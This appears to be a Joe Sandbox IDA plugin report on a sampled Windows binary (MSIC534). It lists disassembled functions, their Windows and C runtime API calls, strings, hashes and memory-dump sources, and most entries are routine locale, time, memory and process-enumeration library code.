Snapshot File: hcaresult_12_2_7ff6d9bf0000_MSIC534.jbxd

Similarity

API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureFreeHeapInformationLastPresentProcessProcessorTimeZone
String ID:
API String ID: 4070488512-0
Opcode ID: df2901f57f053f2e923aa3c6697a5588aa57501976bb22a0017dc6eefe800273
Instruction ID: d578d5c67829027224c94df78c6fd576db451940574d61e1b38b75ec819c7fb1
Opcode Fuzzy Hash: df2901f57f053f2e923aa3c6697a5588aa57501976bb22a0017dc6eefe800273
Instruction Fuzzy Hash: 57D1AF66B1824246E720AF26D8512BD67B1FF987D4F404137EA8D87A95EF3CF861CB40

Function 00007FF6D9C48620 Relevance: 9.2, APIs: 6, Instructions: 172COMMONLIBRARYCODE

Download Yara Rule

APIs

EnumSystemLocalesW.KERNEL32(00000000,00000092,?,?,00000000,?,?,00007FF6D9C3D493), ref: 00007FF6D9C48779
GetUserDefaultLCID.KERNEL32(00000000,00000092,?,?), ref: 00007FF6D9C48792
IsValidCodePage.KERNEL32 ref: 00007FF6D9C487CE
IsValidLocale.KERNEL32 ref: 00007FF6D9C487E4
GetLocaleInfoW.KERNEL32 ref: 00007FF6D9C48840
GetLocaleInfoW.KERNEL32 ref: 00007FF6D9C4885C

Memory Dump Source

Source File: 0000000C.00000002.1447928637.00007FF6D9BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6D9BF0000, based on PE: true

Associated: 0000000C.00000002.1447903010.00007FF6D9BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1447979243.00007FF6D9C52000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448006981.00007FF6D9C6C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C71000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C77000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6d9bf0000_MSIC534.jbxd

Similarity

API ID: Locale$InfoValid$CodeDefaultEnumLocalesPageSystemUser
String ID:
API String ID: 3082464267-0
Opcode ID: afc32d9d63be1d3e4626d176850ab3f8e49c11078196f985b874c262b1335c21
Instruction ID: f7bcad90012ac5cc00d8239de6c9441cff7f715bb4769740374e4d72d5292b8d
Opcode Fuzzy Hash: afc32d9d63be1d3e4626d176850ab3f8e49c11078196f985b874c262b1335c21
Instruction Fuzzy Hash: 0B715822F186028AFB609F64D8606BD23B0BF487C8F844536CA0D97695EF3CF865CB51

Function 00007FF6D9C2DB38 Relevance: 9.1, APIs: 6, Instructions: 86COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlCaptureContext.KERNEL32 ref: 00007FF6D9C2DBC3
RtlLookupFunctionEntry.KERNEL32 ref: 00007FF6D9C2DBDB
RtlVirtualUnwind.KERNEL32 ref: 00007FF6D9C2DC16
IsDebuggerPresent.KERNEL32 ref: 00007FF6D9C2DC4F
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF6D9C2DC59
UnhandledExceptionFilter.KERNEL32 ref: 00007FF6D9C2DC64

Memory Dump Source

Source File: 0000000C.00000002.1447928637.00007FF6D9BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6D9BF0000, based on PE: true

Associated: 0000000C.00000002.1447903010.00007FF6D9BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1447979243.00007FF6D9C52000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448006981.00007FF6D9C6C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C71000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C77000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6d9bf0000_MSIC534.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
String ID:
API String ID: 1239891234-0
Opcode ID: 83b412ae3b68c008a892cd0af64821969cb4994b1a61d8c39dda2845404606c4
Instruction ID: a2c36fd79ec171b4187e6b1da53cfa92178f467adba9bb3ac1f4e7fa7f76eb60
Opcode Fuzzy Hash: 83b412ae3b68c008a892cd0af64821969cb4994b1a61d8c39dda2845404606c4
Instruction Fuzzy Hash: 94415332618B8186E760CF25E8403AE73B4FB98794F500236EA9D87B98DF7CD565CB00

Function 00007FF6D9C48428 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 51COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(?,?,?,?,?,?,?,00007FF6D9C487C1), ref: 00007FF6D9C48481
GetLocaleInfoW.KERNEL32(?,?,?,?,?,?,?,00007FF6D9C487C1), ref: 00007FF6D9C484AE
GetACP.KERNEL32(?,?,?,?,?,?,?,00007FF6D9C487C1), ref: 00007FF6D9C484C4

Strings

ACP, xrefs: 00007FF6D9C4844D
OCP, xrefs: 00007FF6D9C4845D

Memory Dump Source

Source File: 0000000C.00000002.1447928637.00007FF6D9BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6D9BF0000, based on PE: true

Associated: 0000000C.00000002.1447903010.00007FF6D9BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1447979243.00007FF6D9C52000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448006981.00007FF6D9C6C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C71000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C77000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6d9bf0000_MSIC534.jbxd

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: 337680252ed998718458d653699ea08981dcd96a061274d2fe919e2dc49f18ba
Instruction ID: a9b305cf8d855991a48ff70fca7d82e427ed07cd960f359751d1d99f6cde5a33
Opcode Fuzzy Hash: 337680252ed998718458d653699ea08981dcd96a061274d2fe919e2dc49f18ba
Instruction Fuzzy Hash: D4112C22B1C64282F6B4DF62A45057E62B4FF487C4F406432EA4EC3695DF3CF9618B90

Function 00007FF6D9C37A7C Relevance: 8.0, APIs: 3, Strings: 1, Instructions: 1001COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6D9C37EB3
_get_daylight.LIBCMT ref: 00007FF6D9C37F53
_get_daylight.LIBCMT ref: 00007FF6D9C37F6C

Strings

0, xrefs: 00007FF6D9C38398

Memory Dump Source

Source File: 0000000C.00000002.1447928637.00007FF6D9BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6D9BF0000, based on PE: true

Associated: 0000000C.00000002.1447903010.00007FF6D9BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1447979243.00007FF6D9C52000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448006981.00007FF6D9C6C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C71000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C77000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6d9bf0000_MSIC534.jbxd

Similarity

API ID: _get_daylight$_invalid_parameter_noinfo
String ID: 0
API String ID: 1286766494-4108050209
Opcode ID: 41cca790a5cc39c673306f57ff37011ce6ce58c9ccc5238fbbcf1a752aebdf6b
Instruction ID: f6fb9ec3ad5fd1c8991a1e4a8ee7447d22c93bc7e183eac0f9f1a200c4d20db0
Opcode Fuzzy Hash: 41cca790a5cc39c673306f57ff37011ce6ce58c9ccc5238fbbcf1a752aebdf6b
Instruction Fuzzy Hash: 05928932A086828AEB748F75945017E37B6FB85BC4F448136DB8987B99DF3DE921C700

Function 00007FF6D9C43FC4 Relevance: 7.8, APIs: 5, Instructions: 286COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6D9C44010
FindFirstFileExW.KERNEL32 ref: 00007FF6D9C4412C

Memory Dump Source

Source File: 0000000C.00000002.1447928637.00007FF6D9BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6D9BF0000, based on PE: true

Associated: 0000000C.00000002.1447903010.00007FF6D9BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1447979243.00007FF6D9C52000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448006981.00007FF6D9C6C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C71000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C77000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6d9bf0000_MSIC534.jbxd

Similarity

API ID: FileFindFirst_invalid_parameter_noinfo
String ID:
API String ID: 2227656907-0
Opcode ID: 47d46f8031b63c899680aa499be73dd33220b322af9a5b7722bdc02ba7ebf0c0
Instruction ID: 8a057a66ecd0f23c5792539c16eac9bc37a065c25d489a914251878e6ac9a2d1
Opcode Fuzzy Hash: 47d46f8031b63c899680aa499be73dd33220b322af9a5b7722bdc02ba7ebf0c0
Instruction Fuzzy Hash: 38B1A222B1869241EA60DF6199106BD63B1EB98BE4F645133EE5D87BC5EE3CF461CB00

Function 00007FF6D9C027B8 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00007FF6D9C02819
IsDebuggerPresent.KERNEL32 ref: 00007FF6D9C02831
OutputDebugStringW.KERNEL32 ref: 00007FF6D9C02842

Strings

ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00007FF6D9C0283B

Memory Dump Source

Source File: 0000000C.00000002.1447928637.00007FF6D9BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6D9BF0000, based on PE: true

Associated: 0000000C.00000002.1447903010.00007FF6D9BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1447979243.00007FF6D9C52000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448006981.00007FF6D9C6C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C71000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C77000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6d9bf0000_MSIC534.jbxd

Similarity

API ID: DebugDebuggerErrorLastOutputPresentString
String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
API String ID: 389471666-631824599
Opcode ID: 0a006dacdcb009a39946ba4df59ee5c25c313724c8cad9f10cc9e586cf2139f0
Instruction ID: aad00172a6e81cbc8b22e47b700cc2aaaa924c5ea80db0ed72b9c64f55b42860
Opcode Fuzzy Hash: 0a006dacdcb009a39946ba4df59ee5c25c313724c8cad9f10cc9e586cf2139f0
Instruction Fuzzy Hash: 0111F832A14B8297E7449F26DA5537D32B4FB48795F405136C64D82A65EF3CE4B4C710

Function 00007FF6D9C41F2C Relevance: 6.1, APIs: 4, Instructions: 144timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

_get_daylight.LIBCMT ref: 00007FF6D9C41F5A

Part of subcall function 00007FF6D9C41B98: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6D9C41BAC

_get_daylight.LIBCMT ref: 00007FF6D9C41F6B

Part of subcall function 00007FF6D9C41B38: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6D9C41B4C

_get_daylight.LIBCMT ref: 00007FF6D9C41F7C

Part of subcall function 00007FF6D9C41B68: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6D9C41B7C

Part of subcall function 00007FF6D9C3E5C0: HeapFree.KERNEL32(?,?,?,00007FF6D9C46936,?,?,?,00007FF6D9C46CB3,?,?,00000000,00007FF6D9C47239,?,?,?,00007FF6D9C4716B), ref: 00007FF6D9C3E5D6
Part of subcall function 00007FF6D9C3E5C0: GetLastError.KERNEL32(?,?,?,00007FF6D9C46936,?,?,?,00007FF6D9C46CB3,?,?,00000000,00007FF6D9C47239,?,?,?,00007FF6D9C4716B), ref: 00007FF6D9C3E5E0

GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF6D9C421C6), ref: 00007FF6D9C41FA3

Memory Dump Source

Source File: 0000000C.00000002.1447928637.00007FF6D9BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6D9BF0000, based on PE: true

Associated: 0000000C.00000002.1447903010.00007FF6D9BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1447979243.00007FF6D9C52000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448006981.00007FF6D9C6C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C71000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C77000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6d9bf0000_MSIC534.jbxd

Similarity

API ID: _get_daylight_invalid_parameter_noinfo$ErrorFreeHeapInformationLastTimeZone
String ID:
API String ID: 3458911817-0
Opcode ID: ede5a0b6ed619ab1c9e683908661bffefd74f46d039d7be0245d02b2f95aec8a
Instruction ID: b7653e74826a37274feccac288e131600323fe05d3890375ea0782138244c1f2
Opcode Fuzzy Hash: ede5a0b6ed619ab1c9e683908661bffefd74f46d039d7be0245d02b2f95aec8a
Instruction Fuzzy Hash: 82511C32B1864286E720AF2698815BD6770BB587C4F405137EA8DC3A96DF3CF4618B50

Function 00007FF6D9BF5A80 Relevance: 6.1, APIs: 4, Instructions: 86processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 00007FF6D9BF5AE3
Process32FirstW.KERNEL32 ref: 00007FF6D9BF5B53
OpenProcess.KERNEL32 ref: 00007FF6D9BF5B6C

Memory Dump Source

Source File: 0000000C.00000002.1447928637.00007FF6D9BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6D9BF0000, based on PE: true

Associated: 0000000C.00000002.1447903010.00007FF6D9BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1447979243.00007FF6D9C52000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448006981.00007FF6D9C6C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C71000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C77000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6d9bf0000_MSIC534.jbxd

Similarity

API ID: CreateFirstOpenProcessProcess32SnapshotToolhelp32
String ID:
API String ID: 3397401024-0
Opcode ID: e2a5f8d9e8f60080174f79bf089e6ca0881c36968e936192699cda913d76063d
Instruction ID: 83e75609c0652789988d8a872e3d5a1dd4109f8dc7e241b14808e2b2b1557bb8
Opcode Fuzzy Hash: e2a5f8d9e8f60080174f79bf089e6ca0881c36968e936192699cda913d76063d
Instruction Fuzzy Hash: 4F316C36A09B4485E740DF61F8446AE77B4BB487A8F544235EE6D83BA4DF7CD065C700

Function 00007FF6D9C28D5C Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 00007FF6D9C28D88
GetCurrentThreadId.KERNEL32 ref: 00007FF6D9C28D96
GetCurrentProcessId.KERNEL32 ref: 00007FF6D9C28DA2
QueryPerformanceCounter.KERNEL32 ref: 00007FF6D9C28DB2

Memory Dump Source

Source File: 0000000C.00000002.1447928637.00007FF6D9BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6D9BF0000, based on PE: true

Associated: 0000000C.00000002.1447903010.00007FF6D9BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1447979243.00007FF6D9C52000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448006981.00007FF6D9C6C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C71000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C77000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6d9bf0000_MSIC534.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: c4d06db6656c5a7f97c831f89d2f69de82a2f983ad5f790ab5c4857bf2cfd4f4
Instruction ID: 747ef37db34a83e200ac4e1a050cd824a6761aaaacf23b5b89ed42913d4d6b97
Opcode Fuzzy Hash: c4d06db6656c5a7f97c831f89d2f69de82a2f983ad5f790ab5c4857bf2cfd4f4
Instruction Fuzzy Hash: B9111C22B14B018AEB409F60E8542BD33B4FB597A8F441A32DA6D867A4DF7CD1648340

Function 00007FF6D9C0B618 Relevance: 5.5, Strings: 3, Instructions: 1755COMMON

Download Yara Rule

Strings

0123456789ABCDEFabcdef-+XxPp, xrefs: 00007FF6D9C0B67D, 00007FF6D9C0BCC6, 00007FF6D9C0BF30, 00007FF6D9C0C4FD
false, xrefs: 00007FF6D9C0B61D
gfffffff, xrefs: 00007FF6D9C0CC9A

Memory Dump Source

Source File: 0000000C.00000002.1447928637.00007FF6D9BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6D9BF0000, based on PE: true

Associated: 0000000C.00000002.1447903010.00007FF6D9BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1447979243.00007FF6D9C52000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448006981.00007FF6D9C6C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C71000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C77000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6d9bf0000_MSIC534.jbxd

Similarity

API ID: LockitLockit::_std::_
String ID: 0123456789ABCDEFabcdef-+XxPp$false$gfffffff
API String ID: 3382485803-1963183185
Opcode ID: d5930b85c512c2f5a709a7304efc8b54f1e46f52a8e9e10162cbe9e8de025b2c
Instruction ID: 7509e16ee913a10e4a7082a206f3dbe0fa85a4ea5baa9977e9169330fe2e432a
Opcode Fuzzy Hash: d5930b85c512c2f5a709a7304efc8b54f1e46f52a8e9e10162cbe9e8de025b2c
Instruction Fuzzy Hash: 8CF29CA6A09A8685EF64DF1AD15027D73B0FB51BC4F949032DA4E877A1CF2DE871D700

Function 00007FF6D9C02C64 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41windowCOMMON

Download Yara Rule

APIs

GetLocaleInfoEx.KERNEL32(?,?,?,?,?,?,00000000,00007FF6D9BF2EDA), ref: 00007FF6D9C02C8A
FormatMessageA.KERNEL32 ref: 00007FF6D9C02CBD

Strings

!x-sys-default-locale, xrefs: 00007FF6D9C02C7D

Memory Dump Source

Source File: 0000000C.00000002.1447928637.00007FF6D9BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6D9BF0000, based on PE: true

Associated: 0000000C.00000002.1447903010.00007FF6D9BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1447979243.00007FF6D9C52000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448006981.00007FF6D9C6C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C71000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C77000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6d9bf0000_MSIC534.jbxd

Similarity

API ID: FormatInfoLocaleMessage
String ID: !x-sys-default-locale
API String ID: 4235545615-2729719199
Opcode ID: 616e43936ec902d1dc742f22eaf0e87de50901db09d4db379d3a225a9463c699
Instruction ID: 9fa7a319fb3433f93fe43f3348de0e2d6c322852de04014a6f016c74908d59ea
Opcode Fuzzy Hash: 616e43936ec902d1dc742f22eaf0e87de50901db09d4db379d3a225a9463c699
Instruction Fuzzy Hash: 070180B2B1878682FB518F12B41077E67B1FB987C5F148036DA4D87A98CF3CD9148B00

Function 00007FF6D9C14ACC Relevance: 5.0, Strings: 3, Instructions: 1270COMMON

Download Yara Rule

Strings

$+xv, xrefs: 00007FF6D9C14C76
, xrefs: 00007FF6D9C15AE0
0123456789-, xrefs: 00007FF6D9C14C7D, 00007FF6D9C14E6A, 00007FF6D9C1513A, 00007FF6D9C1534E

Memory Dump Source

Source File: 0000000C.00000002.1447928637.00007FF6D9BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6D9BF0000, based on PE: true

Associated: 0000000C.00000002.1447903010.00007FF6D9BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1447979243.00007FF6D9C52000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448006981.00007FF6D9C6C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C71000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C77000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6d9bf0000_MSIC534.jbxd

Similarity

API ID: Lockitstd::_$Lockit::_Lockit::~_
String ID: $$+xv$0123456789-
API String ID: 593203224-2753741353
Opcode ID: 1f80f7756efb86f841f614346cbe935230819cbf8c4a37f4fb44688887ca9f98
Instruction ID: 001b87cb40234b3218a80bcc7850bf97e34e484adf8a1f275754860cf9f4bc45
Opcode Fuzzy Hash: 1f80f7756efb86f841f614346cbe935230819cbf8c4a37f4fb44688887ca9f98
Instruction Fuzzy Hash: 6FC29E66A08A8689EB548F59D09027D7770FB46BC8F949033DE4E97BA4DF3DD8A1C304

Function 00007FF6D9C35F50 Relevance: 4.8, APIs: 3, Instructions: 333COMMON

Download Yara Rule

APIs

memcpy_s.LIBCPMT ref: 00007FF6D9C35FB6
memcpy_s.LIBCPMT ref: 00007FF6D9C35FE1

Memory Dump Source

Source File: 0000000C.00000002.1447928637.00007FF6D9BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6D9BF0000, based on PE: true

Associated: 0000000C.00000002.1447903010.00007FF6D9BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1447979243.00007FF6D9C52000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448006981.00007FF6D9C6C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C71000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C77000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6d9bf0000_MSIC534.jbxd

Similarity

API ID: memcpy_s
String ID:
API String ID: 1502251526-0
Opcode ID: fab9e9aadd0945b81b897f5b7e49811b4a2b465777061b46d84eb23cdca4304d
Instruction ID: 5d5fc553353a2fe1c0f701e2e3bf10d889b07ecfe6773eb7a098a1893b79139a
Opcode Fuzzy Hash: fab9e9aadd0945b81b897f5b7e49811b4a2b465777061b46d84eb23cdca4304d
Instruction Fuzzy Hash: E0C1D472A1828A87E764CF25A18566EB7B1F7887C4F419136DB4E83784DF3DE815CB40

Function 00007FF6D9C48080 Relevance: 4.7, APIs: 3, Instructions: 165COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32 ref: 00007FF6D9C480EC

Part of subcall function 00007FF6D9C32F0C: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6D9C32F29

GetLocaleInfoW.KERNEL32 ref: 00007FF6D9C48135

Part of subcall function 00007FF6D9C32F0C: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6D9C32F82

GetLocaleInfoW.KERNEL32 ref: 00007FF6D9C481F9

Memory Dump Source

Source File: 0000000C.00000002.1447928637.00007FF6D9BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6D9BF0000, based on PE: true

Associated: 0000000C.00000002.1447903010.00007FF6D9BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1447979243.00007FF6D9C52000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448006981.00007FF6D9C6C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C71000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C77000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6d9bf0000_MSIC534.jbxd

Similarity

API ID: InfoLocale$_invalid_parameter_noinfo
String ID:
API String ID: 4006003004-0
Opcode ID: cff1a024b7ca25e247c22c251b87b96aec1e6be7386127725a097ef0d44f4a67
Instruction ID: 9c5ef8d83a106839023ee2cfa3e526140a00dbd345af9641ac8c58e972b04b2e
Opcode Fuzzy Hash: cff1a024b7ca25e247c22c251b87b96aec1e6be7386127725a097ef0d44f4a67
Instruction Fuzzy Hash: 5F613B72B086428AEB748F25E5816BD63B1FB48784F448136CB9ED3696DF3CF5618B40

Function 00007FF6D9BF1B70 Relevance: 4.5, APIs: 3, Instructions: 45COMMON

Download Yara Rule

APIs

LoadResource.KERNEL32(?,?,00000001,00007FF6D9BF1B37,?,?,?,00007FF6D9BF1C33,?,?,00000000,00007FF6D9BF192F), ref: 00007FF6D9BF1B8D
LockResource.KERNEL32(?,?,00000001,00007FF6D9BF1B37,?,?,?,00007FF6D9BF1C33,?,?,00000000,00007FF6D9BF192F), ref: 00007FF6D9BF1B9B
SizeofResource.KERNEL32(?,?,00000001,00007FF6D9BF1B37,?,?,?,00007FF6D9BF1C33,?,?,00000000,00007FF6D9BF192F), ref: 00007FF6D9BF1BAF

Memory Dump Source

Source File: 0000000C.00000002.1447928637.00007FF6D9BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6D9BF0000, based on PE: true

Associated: 0000000C.00000002.1447903010.00007FF6D9BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1447979243.00007FF6D9C52000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448006981.00007FF6D9C6C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C71000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C77000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6d9bf0000_MSIC534.jbxd

Similarity

API ID: Resource$LoadLockSizeof
String ID:
API String ID: 2853612939-0
Opcode ID: 179892a1440a4011f79a316d4eae2f10d9d3d726f8d41b0866252d13db6c999d
Instruction ID: cfd95803c8ea2b79d48988c7953c3234c77ca025bcabe6f1151308667e2c9ce4
Opcode Fuzzy Hash: 179892a1440a4011f79a316d4eae2f10d9d3d726f8d41b0866252d13db6c999d
Instruction Fuzzy Hash: 5F019619B0EA4685DF948F62A84017E72B0AF46BD8F5D5832DE1DC7795EE3DD490C300

Function 00007FF6D9C0CD40 Relevance: 4.3, Strings: 2, Instructions: 1755COMMON

Download Yara Rule

Strings

gfffffff, xrefs: 00007FF6D9C0E3C2
0123456789ABCDEFabcdef-+XxPp, xrefs: 00007FF6D9C0CDA5, 00007FF6D9C0D3EE, 00007FF6D9C0D658, 00007FF6D9C0DC25

Memory Dump Source

Source File: 0000000C.00000002.1447928637.00007FF6D9BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6D9BF0000, based on PE: true

Associated: 0000000C.00000002.1447903010.00007FF6D9BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1447979243.00007FF6D9C52000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448006981.00007FF6D9C6C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C71000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C77000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

